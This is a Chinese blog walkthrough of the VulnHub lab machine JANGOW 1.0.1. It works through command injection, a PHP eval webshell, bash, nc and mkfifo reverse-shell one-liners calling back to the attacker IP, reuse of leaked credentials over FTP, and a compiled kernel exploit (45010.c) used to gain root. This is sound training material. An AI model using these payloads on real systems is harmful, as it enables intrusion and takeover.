1-vulnhub靶场,JANGOW: 1.0.1

最新推荐文章于 2023-12-05 22:50:09 发布
最新推荐文章于 2023-12-05 22:50:09 发布
阅读量283 收藏
点赞数
分类专栏: 靶机-每日练习记录 文章标签: php bash linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49078152/article/details/126314915
版权

靶机地址:192.168.56.73
攻击机地址:192.168.56.129

namp搜集信息:
在这里插入图片描述
获取信息:21,80端口开放,linux系统。
访问80端口:
在这里插入图片描述
在这里插入图片描述
右上角的选项发现参数传递,最后发现存在命令执行漏洞。
在这里插入图片描述
尝试反弹shell:
攻击机192.168.56.129进行监听

nc -lvp 2345

命令执行漏洞执行任意一条:
bash反弹:

bash -i >/dev/tcp/192.168.56.129/2345 0>&1 2>&1

NC反弹:

nc -e /bin/bash 192.168.56.129 2345

在这里插入图片描述
发现反弹失败
尝试写入后门:

echo '<?php @eval($_POST['x']); ?>' >> webshell.php

写入成功:
在这里插入图片描述
用蚁剑连接:
在这里插入图片描述
在俩目录下发现俩个账号密码:
在这里插入图片描述
在这里插入图片描述
账号/密码:desafio02/abygurl69,jangow01/abygurl69
尝试用俩账号连接ftp
jangow01显示连接成功
在这里插入图片描述
在site目录下新建反弹shell文件:

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.129 3345 >/tmp/f");?>

在这里插入图片描述
Kali进行监听并访问该文件,成功反弹shell
在这里插入图片描述
这里只可以利用443端口进行反弹。
切换交互式bash

python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
Su 切换用户
俩个尝试后只有01可以进去的
查看sudo命令
Sudo -l
在这里插入图片描述
查看系统内核
uname -a
在这里插入图片描述
查找是否存在漏洞:

searchsploit Ubantu 4.4.0-31

在这里插入图片描述
存在可利用漏洞,下载其中可利用exp
在这里插入图片描述
先编译好然后使用python搭建临时http服务器传过去

gcc 45010.c -o exp
python3 -m http.server 8000

在这里插入图片描述
然后靶机下载该exp

wget http://192.168.56.129:8000/exp

在这里插入图片描述
下载不了
利用ftp传过去:
在这里插入图片描述
上传成功之后来到反弹shell成功的01账户
在这里插入图片描述
先找到exp位置
cd /home/jangow01
给exp给予执行的权限并执行
Chmod +x exp
./exp执行
在这里插入图片描述
完成。

液冷
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mq-msgpush-sdk-1.0.1.jar
05-24
mq-msgpush-sdk-1.0.1jar包及资源
vulnhub之DC9靶机
LainWith的博客
02-15 3370
目录介绍信息收集主机发现主机信息探测访问网站爆破网站-失败漏扫网站sqlmap注入任意文件读取漏洞SSH爆破信息收集二次SSH爆破提权方式1提权方式2参考 介绍 系列: DC(此系列共10台) 发布日期:2019年12月29日 难度:级 Flag:获取root权限并读取唯一的Flag 学习: bp联动xray扫描 sql注入 任意文件读取 ssh开门 提权 靶机地址:https://www.vulnhub.com/entry/dc-9,412/ 从靶场得到提示信息: 靶机更适用Virtualbox
vulnhub靶场,DC-1
kukudeshuo的博客
07-10 537
vulnhub靶场,DC-1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 攻击机:kali(192.168.58.130) 靶机:DC-1(192.168.58.144) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用netdiscover或者arp-scan -l扫描机器网卡上的所有ip 确定靶机目标为192.168.58.144 使用nmap扫描目标靶机端口
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1267
vulnhub靶机AI-Web-1.0渗透笔记
靶场实战】Vulnhub - JANGOW: 1.0.1 靶标实战
做自己喜欢的事,并将其发挥到极致!
05-30 998
Vulnhub - JANGOW: 1.0.1 靶标实战
vulnhub靶机渗透测试DC-2靶机渗透
m0_62008601的博客
04-29 1357
攻击机-kali-IP:192.168.56.102 靶机-dc2-ip:192.168.103 关于我的这两台机子的网络设置在上一篇文章已经提到,这里就不再叙述。 查找dc-2 的IP arp-scan-l 得到ip为192.168.56.103 扫描开启的端口 nmap -sV -p- 192.168.56.103 此时发现开启了80端口和ssh服务且将ssh服务的端口改成了7744端口(ssh默认端口是:22) 因为开启了80端口,此时我们可以去访问它的web服务 此
rocketmq-console-ng-1.0.1.jar
07-22
rocketmq安装web可视化客户端, 已经编译好的包,直接执行java -jar即可运行,...nohup java -jar rocketmq-console-ng-1.0.1.jar >>/soft/RocketMQ/rocketmqlogs/log.out 2>&1 & 后台启动 --当终端断了也不会停止服务
emas-services-1.0.1.jar
09-17
<!... ... <artifactId>emas-services <version>1.0.1 mvn install:install-file -DgroupId=com.aliyun.ams -DartifactId=emas-services -Dversion=1.0.1 -Dpackaging=jar -Dfile=F:\jars\emas-services-1.0.1.jar
VulnHub----DC1靶场记录
x1871329637的博客
04-26 3104
00-环境介绍 靶机下载地址:DC: 1 ~ VulnHub 攻击机:kali2022:192.168.200.129 DC1:192.168.200.135 目标:拿到5个flag 1由于这是一次黑盒测试所以只能根据目标mac地址来确认靶机的ip信息 由此判定靶机ip为192.168.200.135 2nmap直接扫 nmap -A 192.168.200.135 -p 1-65535 由此可见开放了22 80 111 42892端口,可以先去访问一下80端口 .
Jangow
果粒程
05-15 641
尝试常规的反弹shell,发现都不可以,可能是nc 不支持 -e 参数,这个时候可以使用 mkfifo 命令创建命名管道反弹shell;使用蚁剑在/var/www/html/site/下面新建shell.php文件,内容在下面。使用之前翻到的两个账号密码分别尝试,结果.backup 文件的可以登陆,翻看下没有什么有用的信息。用浏览器去访问shell.php文件,成功反弹shell。上传exp文件到靶机,增加执行权限,然后执行。我使用的是45010.c,将文件下载到本地。确认开放了21、80端口。
Vulnhub靶场Jangow靶机环境找不到ip解决方法。
m0_64376783的博客
04-14 677
删除etc得到了/ vim /etc 接着补全 vim /etc/network 回车看见网卡界面。先配置好,因为扫描的时候会扫不到ip 网络模式调节为桥接模式,然后开机,按e键,进入编辑模式输入。pwd 查看目录 cd init.d 进入目录,ls查看,看见networking。小小挫折,自己解决,那当然是不可能的。要进入vim /etc/network/interfaces 修改网卡。尝试关机重启,重启以后一直在加载,说明没有效果,方法行不通。ip a查看 网卡ens33 斜杠打不了,只能一步步进入。
Fawkes(vulnhub)
wcl20010的博客
05-29 1069
HarryPotter: Fawkes ~ VulnHub靶机难度高 目录 1.主机发现 2. 端口扫描 3.漏洞发现 Ftp 4.缓冲区溢出 使用edb调试server_hogwarts 攻击思路: 确定溢出位置: 5.反弹shell 构造exp 拿下靶机shell 升级shell 6.提权(信息收集) 信息收集 流量分析 提权 漏洞检测 漏洞利用 找网上的exp测试 ​编辑 执行 1.主机发现 arp-scan -l 2. 端口扫描
vulnhub:jangow1.0.1靶机
qq_63283137的博客
09-25 246
试试https的443与http的80、一般服务器都不会限制这些端口,访问2.php并监听443。写入文件2.php,并用浏览器访问2.php,进行反弹用户的shell。反弹shell,nc -e参数不支持,bash -i也不支持。发现反弹不成功,试了很多反弹命令都不成功,可能是端口限制。成功反弹shell,查看系统的版本内核信息。尝试登录ftp,使用上面的两个账户密码
vulnhub Monitoring: 1
箭雨镜屋
07-18 952
渗透思路:nmap扫描 ---- 默认用户名+弱密码登录Nagios XI ---- 利用Nagios XI 5.6.5的RCE漏洞获得root的shell
vulnhub靶场:DC-1 思路详解
weixin_62369433的博客
09-24 437
快速入门学习vulnhub靶场
vulnhub靶场4:jangow01
Genarior的专栏
04-24 140
13、通过蚁剑上传,编译,并执行。提权成功,cat /root/proof.txt。12、通过searchsploit查看是否有可以提权的点,找到45010.c。11、查看系统版本,ubuntu 16.04 内核版本4.4.0-31。3、开放21、80端口,访问http看看,发现命令执行。8、使用蚁剑写入管道方式的反弹shell脚本。1、当nc -e被裁剪,使用管道反弹shell。7、nc没有-e选项,无法反弹shell。6、蚁剑连接 ,找到几个密码。9、443端口成功反弹。3、查看系统提权exp。
Vulnhub-jangow-01-1.0.1靶场练习笔记
qq_54060725的博客
04-17 131
searchsploit搜索ubuntu16.04。把45010.c的代码复制出来,使用蚁剑上传。主机开放21(ftp)和80端口。内核版本是ubuntu16.04。打开终端,查看系统信息进行提权。写入shell.php反弹nc。访问shell.php触发反弹。dirsearch爆破目录。利用echo写入一句话木马。切换完整的交互式bash。发现.backup文件。这里只能反弹443端口。nmap扫描主机端口。gcc编译eva.c。
Vulnhub - JANGOW: 1.0.1
最新发布
shuozhuqiu6452的博客
12-05 90
vulnhub - JANGOW: 1.0.1
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 994
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值